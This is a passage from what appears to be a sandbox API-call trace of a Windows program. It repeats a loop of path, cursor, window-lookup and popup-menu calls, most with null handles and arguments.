returned 0x1b00018 [0100.635] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.635] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.635] PathFileExistsW (pszPath=0x0) returned 0 [0100.635] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.635] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.635] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.635] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.635] GetMenu (hWnd=0x0) returned 0x0 [0100.635] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.635] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.635] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.636] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.636] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.636] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.636] GetStockObject (i=6) returned 0x1b00018 [0100.636] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.636] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.636] PathFileExistsW (pszPath=0x0) returned 0 [0100.636] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.636] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.636] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.636] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.636] GetMenu (hWnd=0x0) returned 0x0 [0100.636] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x408) returned -1 [0100.636] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.636] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.636] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.636] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.636] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.636] GetStockObject (i=6) returned 0x1b00018 [0100.636] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.636] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.636] PathFileExistsW (pszPath=0x0) returned 0 [0100.636] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.636] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.636] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.636] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.636] GetMenu (hWnd=0x0) returned 0x0 [0100.636] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.636] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.636] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.636] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.636] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.636] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.636] GetStockObject (i=6) returned 0x1b00018 [0100.636] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.636] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.636] PathFileExistsW (pszPath=0x0) returned 0 [0100.637] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.637] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.637] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.637] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.637] GetMenu (hWnd=0x0) returned 0x0 [0100.637] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.637] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.637] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.637] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.637] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.637] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.637] GetStockObject (i=6) returned 0x1b00018 [0100.637] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.637] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.637] PathFileExistsW (pszPath=0x0) returned 0 [0100.637] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.637] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.637] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.637] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.637] GetMenu (hWnd=0x0) returned 0x0 [0100.637] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.637] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.637] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.637] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.637] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.637] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.637] GetStockObject (i=6) returned 0x1b00018 [0100.637] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.637] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.637] PathFileExistsW (pszPath=0x0) returned 0 [0100.637] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.637] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.637] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.637] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.637] GetMenu (hWnd=0x0) returned 0x0 [0100.637] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.638] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.638] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.638] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.638] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.638] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.638] GetStockObject (i=6) returned 0x1b00018 [0100.638] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.638] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.638] PathFileExistsW (pszPath=0x0) returned 0 [0100.638] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.638] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.638] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.638] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.638] GetMenu (hWnd=0x0) returned 0x0 [0100.638] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x48e) returned -1 [0100.638] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.638] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.638] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.638] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.638] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.638] GetStockObject (i=6) returned 0x1b00018 [0100.638] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.638] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.638] PathFileExistsW (pszPath=0x0) returned 0 [0100.638] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.638] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.638] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.638] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.638] GetMenu (hWnd=0x0) returned 0x0 [0100.638] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.638] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.638] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.638] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.638] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.638] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.638] GetStockObject (i=6) returned 0x1b00018 [0100.639] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.639] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.639] PathFileExistsW (pszPath=0x0) returned 0 [0100.639] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.639] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.639] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.639] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.639] GetMenu (hWnd=0x0) returned 0x0 [0100.639] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.639] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.639] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.639] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.639] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.639] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.639] GetStockObject (i=6) returned 0x1b00018 [0100.639] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.639] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.639] PathFileExistsW (pszPath=0x0) returned 0 [0100.639] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.639] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.639] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.639] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.639] GetMenu (hWnd=0x0) returned 0x0 [0100.639] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.639] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.639] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.639] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.639] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.639] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.639] GetStockObject (i=6) returned 0x1b00018 [0100.639] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.639] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.639] PathFileExistsW (pszPath=0x0) returned 0 [0100.639] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.639] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.639] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.639] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.640] GetMenu (hWnd=0x0) returned 0x0 [0100.640] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.640] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.640] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.640] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.640] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.640] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.640] GetStockObject (i=6) returned 0x1b00018 [0100.640] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.640] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.640] PathFileExistsW (pszPath=0x0) returned 0 [0100.640] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.640] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.640] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.640] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.640] GetMenu (hWnd=0x0) returned 0x0 [0100.640] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x50f) returned -1 [0100.640] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.640] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.640] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.640] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.640] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.640] GetStockObject (i=6) returned 0x1b00018 [0100.640] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.640] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.640] PathFileExistsW (pszPath=0x0) returned 0 [0100.640] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.640] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.640] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.640] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.640] GetMenu (hWnd=0x0) returned 0x0 [0100.640] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.640] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.640] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.640] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.640] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.641] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.641] GetStockObject (i=6) returned 0x1b00018 [0100.641] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.641] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.641] PathFileExistsW (pszPath=0x0) returned 0 [0100.641] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.641] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.641] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.641] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.641] GetMenu (hWnd=0x0) returned 0x0 [0100.641] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.641] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.641] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.641] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.641] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.641] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.641] GetStockObject (i=6) returned 0x1b00018 [0100.641] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.641] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.641] PathFileExistsW (pszPath=0x0) returned 0 [0100.641] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.641] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.641] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.641] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.641] GetMenu (hWnd=0x0) returned 0x0 [0100.641] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.641] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.641] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.641] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.641] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.641] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.641] GetStockObject (i=6) returned 0x1b00018 [0100.641] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.641] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.641] PathFileExistsW (pszPath=0x0) returned 0 [0100.641] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.641] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.642] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.642] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.642] GetMenu (hWnd=0x0) returned 0x0 [0100.642] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.642] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.642] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.642] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.642] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.642] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.642] GetStockObject (i=6) returned 0x1b00018 [0100.642] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.642] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.642] PathFileExistsW (pszPath=0x0) returned 0 [0100.642] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.642] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.642] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.642] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.642] GetMenu (hWnd=0x0) returned 0x0 [0100.642] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x11b) returned -1 [0100.642] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.642] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.642] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.642] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.642] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.642] GetStockObject (i=6) returned 0x1b00018 [0100.642] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.642] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.642] PathFileExistsW (pszPath=0x0) returned 0 [0100.642] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.642] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.642] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.642] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.642] GetMenu (hWnd=0x0) returned 0x0 [0100.642] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.642] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.642] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.642] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.643] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.643] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.643] GetStockObject (i=6) returned 0x1b00018 [0100.643] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.643] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.643] PathFileExistsW (pszPath=0x0) returned 0 [0100.643] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.643] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.643] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.643] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.643] GetMenu (hWnd=0x0) returned 0x0 [0100.643] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.643] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.643] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.643] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.643] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.643] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.643] GetStockObject (i=6) returned 0x1b00018 [0100.643] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.643] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.643] PathFileExistsW (pszPath=0x0) returned 0 [0100.643] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.643] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.643] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.643] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.643] GetMenu (hWnd=0x0) returned 0x0 [0100.643] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.643] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.643] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.643] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.643] GetMenuItemRect (in: hWnd=0x0, 